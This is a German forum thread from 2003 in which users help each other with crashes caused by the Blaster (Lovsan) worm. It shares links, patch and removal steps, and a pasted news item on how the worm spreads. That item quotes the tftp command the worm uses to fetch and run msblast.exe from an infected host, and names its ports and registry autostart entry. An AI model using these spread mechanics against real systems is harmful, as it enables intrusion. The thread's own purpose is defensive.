PC Probleme- Hilfe

Seite 1 von 2
neuester Beitrag: 12.08.03 23:11
eröffnet am: 12.08.03 09:21 von: dreameagle Anzahl Beiträge: 37
neuester Beitrag: 12.08.03 23:11 von: Spanier Leser gesamt: 6043
davon Heute: 1
bewertet mit 0 Sternen

Seite: Zurück
| 2 Weiter  

12.08.03 09:21

5092 Postings, 8275 Tage dreameaglePC Probleme- Hilfe

Ich habe es gestern einen Beitrag bewertet- einige Minuten später kam die Meldung Pc muss neu gestratet werden- da remoteprozeduraufruf(RPC) unerwartet beendet wurde. !! heul- jetzt zeigt er mir alle paar Minuten die Meldung. Aucher der YAW springt an und isoliert ne Datei- Was soll ich tun?
Immer wenn ich die Bewertung rechts anklicke kommt die Meldung sofort :-((
Bitte um Hilfe- danke DE


Carpe Diem...  

12.08.03 09:35

Clubmitglied, 50540 Postings, 8826 Tage vega2000DE: Windows 98 ?

Hast du  "ad-aware 6.0" auf deinem Rechner ? Falls ja, starte mal das Teil, -falls nicht bei chip.de downloden oder bei mir;-). Wahrscheinlich haben sich ein paar unerlaubte Dateien in deiner Registry eingenistet. ad-ware findet die, -die unerlaubten Dateien löschen. Außerdem empfehle ich die unter "Zubehör" -"Systemsteuerung" "Scandisk" auszuführen. Anschließend den Rechner neu starten.

Grüßle

ad-aware 6.0  

12.08.03 09:42

5092 Postings, 8275 Tage dreameagleVega XP -

Sorry hatte ich vergessen anzugeben !!Ich taru mich jetzt gar nicht mehr auf die Bewertungen zu klicken- denke dann gehts wieder los-




Carpe Diem...
jetzt wieder -heul  

12.08.03 09:44

Clubmitglied, 50540 Postings, 8826 Tage vega2000Mach mal was ich gesacht habe

Kannste nix verkehrt machen. Manchmal hilft es schon wenn du den Rechner neu startest. Scheiß Windows !!!!


Und hör auf zu heulen.........  

12.08.03 09:52

1274 Postings, 8780 Tage roumataAshampoo

Ashampoo Win Optimizer zum "Reinigen"

Sollte man neben viel Unützes Zeug schon drauf haben  

12.08.03 10:11

1056 Postings, 8634 Tage NowonderDer RPC-Bug ist ein ernsthaftes Sicherheitsproblem

Mehr zur Problematik:

http://www.heise.de/newsticker/data/ju-26.07.03-000/

http://www.ariva.de/board/167814/...ll&search_id=&search_full=rpc&452 (ab Posting 14)

Abhilfe:

http://microsoft.com/downloads/...354406C-C5B6-44AC-9532-3DE40F69C074

PS Könnte nicht schaden, wenn du 1x täglich bei http://www.heise.de/security/ vorbeischaust. Der RPC-Bug ist schon seit Wochen bekannt.

Gruss

Nowonder  

12.08.03 10:27

Clubmitglied, 50540 Postings, 8826 Tage vega2000Nowonder hat recht, lies mal

News

Sponsored by
Meldung vom 12.08.2003 09:30[<<Vorige]  

Alle Schotten dicht -- W32.Blaster greift an

Der seit Tagen erwartete Wurm, der einen Fehler im RPC/DCOM-Dienst unter Windows 2000 und XP ausnutzt, ist im Internet unterwegs. Symantec taufte ihn W32.Blaster, McAfee nennt ihn W32.Lovsan. Das Bundesamt für Sicherheit in der Informationstechnik (BSI) hat ebenfalls bereits eine Warnung herausgegben, siehe dazu das BSI-Advisory auf heise Security.

Auf befallenenen Systemen (A) startet der Wurm einen TFTP-Server und greift weitere Windows-Systeme (B) auf Port 135 an. War ein Angriff erfolgreich, wird der eingeschleuste Code ausgeführt, der auf System B eine Shell auf Port 4444 öffnet. System A veranlasst System B mittels TFTP (tftp <host a> get msblast.exe) die Datei msblast.exe in das Verzeichnis %WinDir%System32 nachzuladen und zu starten. Anschließend installiert sich der Wurm auf System B, schließt Port 4444, startet einen TFTP-Server und greift weitere Systeme an.

Der Wurm versucht nach Angaben von Symantec eine Denial-of-Service-Attacke gegen windowsupdate.com durchzuführen. Als Zeitraum dafür ist der 16. August bis 31. Dezember definiert. Auf befallenen Systemen werden folgende Registry Einträge erzeugt:

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun "windows auto update" = msblast.exe HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun "windows auto update" = msblast.exe I just want to say LOVE YOU SAN!! bill  

Erkennbar ist ein Befall auch am offenen UDP-Port 69, auf dem der TFTP-Server auf ankommende Verbindungen wartet. Darüberhinaus öffnet ein infiziertes System 20 TCP-Ports im Bereich 2500 bis 2522 und versucht Verbindungen mit weiteren Systemen aufzunehmen. Der genaue Zweck dieser Verbindungen ist noch unklar, Symantec gibt an, dass sie zu Angriffszwecken geöffnet werden. NAI weist hingegen darauf hin, dass die Ports im LISTEN-Mode geöffnet werden, also auf eingehende Verbindungen warten.

Symantec hat bereits ein Removal-Tool bereitgestellt, um den Wurm von befallenen System zu entfernen.

Es wird dringend empfohlen, die Patches zum Beseitigen der Sicherheitslücke einzuspielen. Da der Patch einen weiteren Fehler im RPC-Dienst, der DoS-Attacken ermöglicht, nicht beseitigt, sollten zusätzlich die UDP- und TCP-Ports 135 bis 139, 445 und 593 gefiltert werden. (dab/c't)

 

12.08.03 16:54

7738 Postings, 8228 Tage newtrader2002deComputer wird ständig heruntergefahren

hat einer einen Tip auf die Schnelle, was man gegen tun kann.
Dan ke NT  

12.08.03 17:07

7336 Postings, 7978 Tage 54reabtip

Entfernungshinweise:

- Mit AntiVir:

Mit der aktuellen AntiVir Version wird der Virus entfernt. Starten Sie hierzu den Suchlauf und löschen Sie alle infizierten Dateien.

- Manuell bei Windows 2000/ XP:
Um den Virus von Hand zu entfernen, sollten Sie sich im abgesicherten Modus befinden. Drücken Sie die F8 Taste bevor das Bootlogo von Windows erscheint und die Option 'Abgesicherter Modus' wählen. Löschen Sie folgende Dateien:

  • C:%Windows%System32MSBLAST.EXE

Gehen Sie auf Start und wählen Sie 'Ausführen'. Geben Sie im im angezeigten Fenster 'regedit' ein und löschen folgende Registry Einträge:

  • [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
    CurrentVersionRun]
    "windows auto update"="msblast.exe"

Starten Sie den Computer neu und anschließend den Suchlauf von AntiVir.

Spielen Sie folgenden Sicherheitspatch von Microsoft ein:

Beachten Sie eventuelle Einträge im Autostart-Ordner und entfernen Sie diese gegebenenfalls.
 
 


 

12.08.03 17:22

5092 Postings, 8275 Tage dreameagle@ Reab

bekomme die letze Datei nicht upgedatet- da sie in a diffent langue(Fehlermeldung) ist - was tun?




Carpe Diem...  

12.08.03 18:15

7738 Postings, 8228 Tage newtrader2002deKlappt nicht

das ist eine Sch...  Microsoft Security kann nicht heruntergeladen werden. Versteh das nicht.
NT  

12.08.03 18:16

5092 Postings, 8275 Tage dreameagleBei mir gins aber !!

Bin seit einer Stunde on- und noch keinmal runtergefahren worden :-)



Carpe Diem...  

12.08.03 18:37

7738 Postings, 8228 Tage newtrader2002dedreameagle

könntest Du mir die Schritte nochmals für einen Laien erklären?  

12.08.03 18:40

7738 Postings, 8228 Tage newtrader2002deup o. T.

12.08.03 19:19

7738 Postings, 8228 Tage newtrader2002dedreameagle - bist Du noch da? o. T.

12.08.03 19:50

372 Postings, 8325 Tage Jones DowHallo zu msblast.exe !

Habe eben die Sache im Tread IM 548880 erklärt wie man den Wurm gelöscht bekommt.

Ist ganz einfach

grüsse

Jones Dow  

12.08.03 20:06

42128 Postings, 9241 Tage satyrDer beschriebene download ist alles für XP

wie ist das bei Win 98 oder bin ich der einzige der das noch hat.
Was tun zum schutz oder entfernen vom Wurm bei Win 98?  

12.08.03 20:09

42128 Postings, 9241 Tage satyrWeiß dafür wie man Holzwürmer tötet! o. T.

12.08.03 20:16

9061 Postings, 8749 Tage taosSchau doch erst mal nach,

ob du diesen Wurm hast.

Taos
 

12.08.03 20:23

415 Postings, 8298 Tage Jeffvom RPC-Prob ist win98se/ME nicht

betroffen, nur NT SP6a, XP SP1, 2000 bis SP4 und Windows Server 2003....
siehe auch das Announcement von M$.

http://www.microsoft.com/technet/treeview/...ty/bulletin/MS03-026.asp

Gruss Jeff  

12.08.03 20:35

42128 Postings, 9241 Tage satyrDanke Jeff das ist doch mal ne gute Auskunft!

Falls du mal ein Holzwurmproblem hast wende dich vertrauensvoll an mich!
Ich weiß wie man ihnen den garaus macht.  

12.08.03 20:42

10524 Postings, 7984 Tage big lebowskyGuten Abend und danke an alle Poster

des Threads.Ich habe es nach Pos.6 von Nowonder versucht,mal sehen,ob es geklappt hat.Bin jetzt schon 2 Minuten online,normalerweise wäre jetzt schon der Absturz erfolgt.

Wenn ich das mit Eurer Hilfe hier geschafft hätte,lasse ich mich zum IT Berater umschulen und gebe Euch eine virtuelle eiskalte Cola aus!

Danke-sind jetzt schon 3 Minuten!  

12.08.03 21:19

29 Postings, 8503 Tage potiWurm

Strg;Alt;Entf. Prozess msblast beenden.  

Seite: Zurück
| 2 Weiter  
   Antwort einfügen - nach oben